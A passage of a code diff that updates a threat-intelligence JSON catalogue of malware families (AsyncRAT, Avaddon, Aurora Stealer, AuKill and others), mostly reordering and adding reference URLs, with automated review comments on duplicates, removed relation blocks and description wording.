+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies",
+ "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/",
"https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat",
+ "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://labs.k7computing.com/?p=21759",
+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
+ "https://twitter.com/vxunderground/status/1519632014361640960",
+ "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/",
+ "https://twitter.com/ESETresearch/status/1449132020613922828",
+ "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
"https://blogs.vmware.com/security/2019/11/threat-analysis-unit-tau-threat-intelligence-notification-asyncrat.html",
- "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://community.riskiq.com/article/24759ad2",
"https://www.esentire.com/blog/asyncrat-activity",
- "https://aidenmitchell.ca/asyncrat-via-vbs/",
- "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
- "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://twitter.com/vxunderground/status/1519632014361640960",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/",
- "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://eln0ty.github.io/malware%20analysis/asyncRAT/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper",
+ "https://aidenmitchell.ca/asyncrat-via-vbs/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://community.riskiq.com/article/3929ede0/description",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
"https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf",
- "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.esentire.com/blog/suspected-asyncrat-delivered-via-iso-files-using-html-smuggling-technique",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/"
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://community.riskiq.com/article/ade260c6",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader",
+ "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser",
+ "https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
],
"synonyms": [],
"type": []
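Review bot: the rewritten AsyncRAT list still carries the Avast Follina post twice, once as `https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia` and once with a trailing slash; since every entry in this list is being re-emitted anyway, this is the moment to deduplicate (a trailing-slash normalisation in the generator would catch this class of duplicate across the whole file). The added `https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#` ends in an empty fragment `#` that should be trimmed.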
@@ -12812,9 +13618,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch",
- "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
+ "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/",
"https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
- "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/"
+ "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/"
],
"synonyms": [],
"type": []
@@ -12827,8 +13633,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere",
- "https://www.group-ib.com/resources/threat-research/silence.html",
- "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/"
+ "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/",
+ "https://www.group-ib.com/resources/threat-research/silence.html"
],
"synonyms": [],
"type": []
@@ -12841,9 +13647,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter",
+ "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-kingswood",
"https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf"
],
"synonyms": [],
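Review bot: the ATMSpitter list keeps both `http://www.secureworks.com/research/threat-profiles/gold-kingswood` and the `https://` form of the same page; while the hunk is already reordering this list, dropping the plain-http duplicate would be a cheap cleanup and avoids pointing consumers at an unencrypted URL.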
@@ -12858,14 +13664,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo",
"https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/",
"https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
- "https://twitter.com/siri_urz/status/1437664046556274694?s=20",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
"https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/",
+ "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://twitter.com/siri_urz/status/1437664046556274694?s=20"
],
"synonyms": [],
"type": []
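Review bot: `https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/` (double slash, kept as context) and the re-added `https://chuongdong.com/reverse%20engineering/2021/10/13/AtomSiloRansomware/` are the same article; only the single-slash form should survive this rewrite.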
@@ -12878,11 +13684,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.attor",
- "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
"https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/",
+ "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html",
+ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami",
"https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform",
- "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
"https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/",
"https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/"
],
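Review bot: `https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform` and the same URL with a trailing slash both remain in the Attor list; one of them should go. The two added cocomelonc.github.io tutorial links are generic persistence write-ups rather than Attor analyses as far as the hunk shows, so a short justification in the commit message (for example, that they cite Attor as the source of a technique) would help future maintainers judge whether they belong here.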
@@ -12906,6 +13714,21 @@
"uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
"value": "August Stealer"
},
+ {
+ "description": "According to Sophos, the AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill",
+ "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/"
+ ],
+ "synonyms": [
+ "SophosKill"
+ ],
+ "type": []
+ },
+ "uuid": "07bd266b-811a-4abe-83b3-471918d6fab4",
+ "value": "AuKill"
+ },
{
"description": "",
"meta": {
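Review bot: the new AuKill entry introduces a fresh `uuid` (`07bd266b-811a-4abe-83b3-471918d6fab4`); please confirm it was generated once and is persisted across regenerations, and run the repository's JSON validation before merging, because a uuid that changes on the next refresh would break any correlations or sightings that reference this cluster. Minor wording: `the Microsoft utility, Process Explorer,` reads better as `the Microsoft utility Process Explorer`.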
@@ -12918,15 +13741,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "316c87d4-4404-42ab-9887-f9e321aed93c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e3065e43-503b-4496-921b-7601dd3d6abd",
"value": "Auriga"
},
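Review bot: this hunk silently deletes the `related` block that linked Auriga to `316c87d4-4404-42ab-9887-f9e321aed93c` with an `almost-certain` similarity tag while the entry's refs and value are unchanged; the same deletion appears for Aurora and Babar further down. If the generator no longer emits cross-galaxy relations, say so in the commit message and check that the reverse links in the target cluster do not dangle; if it is unintentional, the block should be restored.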
@@ -12935,71 +13749,83 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora",
- "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/",
"https://twitter.com/malwrhunterteam/status/1001461507513880576",
- "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/"
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://blog.morphisec.com/in2al5d-p3in4er"
],
"synonyms": [
"OneKeyLocker"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "70c31066-237a-11e8-8eff-37ef1ad0c703",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d",
"value": "Aurora"
},
+ {
+ "description": "First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets, local systems, and act as a loader. During execution, the malware runs several commands through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server within a single base64-encoded JSON file.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer",
+ "https://d01a.github.io/aurora-stealer/",
+ "https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/",
+ "https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html",
+ "https://d01a.github.io/aurora-stealer-builder/",
+ "https://isc.sans.edu/diary/rss/29448",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/",
+ "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ac697773-7239-4f01-b4b3-7da8b2a64bdf",
+ "value": "Aurora Stealer"
+ },
{
"description": "Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
- "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.connectwise.com/resources/avaddon-profile",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://twitter.com/Securityinbits/status/1271065316903120902",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted",
+ "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
"https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/",
"https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/",
+ "https://twitter.com/dk_samper/status/1348560784285167617",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.swascan.com/it/avaddon-ransomware/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://arxiv.org/pdf/2102.04796.pdf",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/",
+ "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis",
"https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire",
- "https://www.swascan.com/it/avaddon-ransomware/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/",
- "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/",
- "https://www.connectwise.com/resources/avaddon-profile",
- "https://twitter.com/dk_samper/status/1348560784285167617",
- "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://arxiv.org/pdf/2102.04796.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://twitter.com/Securityinbits/status/1271065316903120902",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/"
+ "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf"
],
"synonyms": [],
"type": []
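Review bot: the Avaddon `refs` block is a pure reorder: all 32 removed URLs are re-added in different positions and no reference is actually new, which buries the real changes in this hunk (two new Aurora refs, the dropped Aurora `related` link, and the new Aurora Stealer entry). Have the generator emit refs in a stable sorted order so future diffs show only true additions and removals. Also, in the Aurora Stealer description `and act as a loader` should read `and acts as a loader`.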
@@ -13021,10 +13847,11 @@
"value": "AvastDisabler"
},
{
- "description": "",
+ "description": "Bleeping Computer notes about discovery of AVCrypt, a malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, as it removes numerous services, including Windows Update, and provides no contact information, this ransomware may be a wiper.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt",
+ "https://twitter.com/malwrhunterteam/status/976925447043846145",
"https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/"
],
"synonyms": [],
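Review bot: the new AVCrypt description is ungrammatical (`Bleeping Computer notes about discovery of AVCrypt, a malware that ...`) and reads like a raw note rather than an entry summary; suggest `Bleeping Computer reported the discovery of AVCrypt, malware that tries to uninstall existing security software before encrypting the computer. Because it also removes numerous services, including Windows Update, and provides no contact information, it may be a wiper rather than ransomware.` If the text is synced verbatim from the upstream source, fix it there so the correction survives the next refresh.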
@@ -13065,41 +13892,50 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
- "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery",
- "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA",
- "https://reaqta.com/2019/04/ave_maria-malware-part1/",
- "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
- "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
+ "https://www.youtube.com/watch?v=81fdvmGmRvM",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
"https://www.youtube.com/watch?v=T0tdj1WDioM",
"https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
- "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.youtube.com/watch?v=-G82xh9m4hc",
- "https://blog.yoroi.company/research/the-ave_maria-malware/",
- "https://asec.ahnlab.com/en/36629/",
- "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
- "https://www.youtube.com/watch?v=81fdvmGmRvM",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies",
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.youtube.com/watch?v=-G82xh9m4hc",
+ "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing",
+ "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
+ "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
